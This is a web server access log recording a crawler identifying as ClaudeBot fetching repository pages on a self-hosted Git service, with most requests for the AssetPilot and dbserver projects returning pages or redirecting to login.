[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 17001] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fuser%2Fforgot_password" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 211363] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fstars" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fexplore%2Fusers" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.211] [Length 5680] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" -[15/Feb/2026:08:04:56 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/weekly" [Client 216.73.216.188] [Length 8579] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels" [Client 216.73.216.188] [Length 7627] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels" [Client 216.73.216.188] [Length 7621] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/code-frequency" [Client 216.73.216.188] [Length 7540] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/code-frequency" [Client 216.73.216.188] [Length 7536] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues/new" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues/new" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues/new" -[15/Feb/2026:08:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues/new" -[15/Feb/2026:08:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/halfweekly" [Client 216.73.216.188] [Length 8598] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/weekly" [Client 216.73.216.188] [Length 8597] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/halfweekly" [Client 216.73.216.188] [Length 8384] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones" [Client 216.73.216.188] [Length 8454] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/yearly" [Client 216.73.216.188] [Length 8597] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/yearly" [Client 216.73.216.188] [Length 8577] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/contributors" [Client 216.73.216.188] [Length 7622] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/contributors" [Client 216.73.216.188] [Length 7618] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/daily" [Client 216.73.216.188] [Length 8389] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/monthly" [Client 216.73.216.188] [Length 8601] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/daily" [Client 216.73.216.188] [Length 8385] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones" [Client 216.73.216.188] [Length 8465] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/monthly" [Client 216.73.216.188] [Length 8582] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/semiyearly" [Client 216.73.216.188] [Length 8584] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?state=open" [Client 216.73.216.188] [Length 7777] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?state=open" [Client 216.73.216.188] [Length 6780] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/recent-commits" [Client 216.73.216.188] [Length 7531] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/recent-commits" [Client 216.73.216.188] [Length 7528] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=open&type=all" [Client 216.73.216.188] [Length 9954] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/quarterly" [Client 216.73.216.188] [Length 8599] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/semiyearly" [Client 216.73.216.188] [Length 8602] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?state=open" [Client 216.73.216.188] [Length 7784] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/quarterly" [Client 216.73.216.188] [Length 8577] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=all&type=all" [Client 216.73.216.188] [Length 9921] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=all&type=all" [Client 216.73.216.188] [Length 9915] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=closed&type=all" [Client 216.73.216.188] [Length 9961] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=closed&type=all" [Client 216.73.216.188] [Length 9954] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=open&type=all" [Client 216.73.216.188] [Length 9952] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=closed&type=all" [Client 216.73.216.188] [Length 10137] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=closed&type=all" [Client 216.73.216.188] [Length 10128] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=open&type=all" [Client 216.73.216.188] [Length 10124] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=open&type=all" [Client 216.73.216.188] [Length 10115] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fpulls" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fprojects" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=all&type=all" [Client 216.73.216.188] [Length 10094] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=all&type=all" [Client 216.73.216.188] [Length 10088] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2F-%2Fprojects" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fpulls" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fissues" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2F-%2Fpackages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fissues" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fprojects" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/.Notebook" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tags.rss" [Client 216.73.216.188] [Length 343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/.Notebook" -[15/Feb/2026:08:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 17672] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker" -[15/Feb/2026:08:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels" [Client 216.73.216.188] [Length 7617] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 14619] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest" [Client 216.73.216.188] [Length 9796] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 17125] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html" -[15/Feb/2026:08:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 14456] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 11337] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 14181] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.patch" [Client 216.73.216.188] [Length 32801] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/releases.rss" [Client 216.73.216.188] [Length 354] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/releases.rss" [Client 216.73.216.188] [Length 350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.diff" [Client 216.73.216.188] [Length 32145] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 11755] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/projects.sln" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] 